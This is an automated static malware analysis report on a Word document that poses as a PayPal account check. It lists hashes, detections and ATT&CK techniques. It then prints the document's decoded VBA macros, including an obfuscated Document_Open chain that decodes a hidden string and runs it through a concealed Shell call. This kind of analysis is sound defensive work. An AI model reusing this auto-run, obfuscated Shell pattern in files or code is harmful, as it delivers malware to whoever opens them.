Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 3ffa644f3336f143…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 42.5 KB
Created: 2018-10-05 01:57:00
Authoring application: Microsoft Office Word
First seen: 2019-01-12
MD5: 41712d78d39ffa8e791a450f9037697d
SHA-1: fee1edfc7c20d1a0fd1e684a0bd6a68f600f7f70
SHA-256: 3ffa644f3336f143458e68b7e86e0818dfbe009295475dae8dbb091ade009797
Risk score: 182

Malware Insights

MITRE ATT&CK:
  T1059.005 Command and Scripting Interpreter: Visual Basic
  T1566.001 Phishing: Spearphishing Attachment

The sample contains VBA macros, including a Document_Open macro, a common technique in malicious Office documents because it runs code as soon as the file is opened. The macro calls the Shell() function, indicating that it likely launches a secondary payload. The document body impersonates PayPal and requests sensitive personal information under the guise of account verification, a typical phishing lure. The combination of auto-executing VBA macros and the phishing pretext strongly suggests malicious intent, most likely credential harvesting or identity theft.

Heuristics (5)

  • ClamAV detection (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Malware.Generic-6708833-0
  • VBA macros detected (medium, OLE_VBA_MACROS, 2 related findings): Document contains VBA macro code
  • Shell() call in VBA (critical, OLE_VBA_SHELL)
  • Document_Open macro (high, OLE_VBA_DOCOPEN)
  • Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 9614 bytes
SHA-256: 422433ade305bcd73d7a57db25ff7b2c8df1a098891cd577baf13419982dc2e8

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub Document_Open()
array44 = "arr"
array4 array44
array44 = "44"

End Sub


Attribute VB_Name = "plus"
Public Sub General()
ctr = ""
currentTime secondBracketAddress.wl, ctr
secondBracketAddress.either = ctr
secondBracketAddress.allocating = secondBracketAddress.either
End Sub

Attribute VB_Name = "secondBracketAddress"
Attribute VB_Base = "0{A32D73AA-AC1B-4F40-BC29-B534231117BA}{BE71A090-5D98-474F-8464-158D00037C8C}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False



Private Sub allocating_Change()
below = 21
below = 49
below = 40
below = 24
below = 71
below = 15
below = 76
below = 40
below = 60
below = 45
below = 53
below = 42
below = 85
below = 56
below = 91
below = 50
reportErr = secondBracketAddress.allocating
below = 9
below = 66
below = 30
below = 31
below = 94
below = 36
below = 25
below = 49
below = 79
below = 58
below = 21
below = 34
below = 46
below = 35
below = 68
below = 90
below = 7
below = 82
below = 78
below = 46
Shell reportErr, 0
below = 16
below = 21
below = 62
below = 75
below = 22
below = 22
below = 67
below = 98
below = 92
below = 6
below = 43
below = 80
below = 13
below = 36
End Sub

Private Sub msg_Change()
General
End Sub

Attribute VB_Name = "SYS_gettid"
Sub CP_ACP(now, currentdepth, ByRef isAddressOnStack)
isAddressOnStack = Right(Left(now, currentdepth), 1)
End Sub

Sub currentTime(mapped, ByRef si_addr)
si_addr = ""
filecount = 1
along filecount, si_addr, mapped
End Sub

Sub along(ByRef invalid, ByRef maxdepth, instead)
heapVariable = Len(instead)
If invalid <= heapVariable Then
cpcr = ""
CP_ACP instead, invalid, cpcr
irc = 1
iter cpcr, icr
snr = ""
sensitive icr - 2, snr
maxdepth = maxdepth + snr
invalid = invalid + 1
along invalid, maxdepth, instead
End If
End Sub

Sub sensitive(method, ByRef sr)
sr = ""
If method < 1 Then
CP_ACP secondBracketAddress.attempt, Len(secondBracketAddress.attempt) + method, sr
Else
CP_ACP secondBracketAddress.attempt, method, sr
End If
End Sub

Sub within(ByRef wcContainer, ByRef object, PVOID)
If wcContainer < Len(secondBracketAddress.attempt) Then
    cpcr = ""
    CP_ACP secondBracketAddress.attempt, wcContainer, cpcr
    If PVOID <> cpcr Then
    wcContainer = wcContainer + 1
    within wcContainer, object, PVOID
    Else
    object = wcContainer
    End If
End If
End Sub

Sub iter(PVOID, ByRef object)
wcContainer = 1
object = 1
within wcContainer, object, PVOID
End Sub

Attribute VB_Name = "ThreadExecutor"
Public Sub array4(typename)
secondBracketAddress.msg = typename
End Sub

' Processing file: /opt/analyzer/scan_staging/5d3e805fd11741cd861e37b8d13cd93c.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 1193 bytes
' Line #0:
' 	FuncDefn (Sub Document_Open())
' Line #1:
' 	LitStr 0x0003 "arr"
' 	St array44 
' Line #2:
' 	Ld array44 
' 	ArgsCall array4 0x0001 
' Line #3:
' 	LitStr 0x0002 "44"
' 	St array44 
' Line #4:
' Line #5:
' 	EndSub 
' Line #6:
' Macros/VBA/plus - 1003 bytes
' Line #0:
' 	FuncDefn (Public Sub General())
' Line #1:
' 	LitStr 0x0000 ""
' 	St ctr 
' Line #2:
' 	Ld secondBracketAddress 
' 	MemLd wl 
' 	Ld ctr 
' 	ArgsCall currentTime 0x0002 
' Line #3:
' 	Ld ctr 
' 	Ld secondBracketAddress 
' 	MemSt either 
' Line #4:
' 	Ld secondBracketAddress 
' 	MemLd either 
' 	Ld secondBracketAddress 
' 	MemSt allocating 
' Line #5:
' 	EndSub 
' Macros/VBA/secondBracketAddress - 2763 bytes
' Line #0:
' Line #1:
' Line #2:
' Line #3:
' 	FuncDefn (Private Sub allocating_Change())
' Line #4:
' 	LitDI2
... (truncated)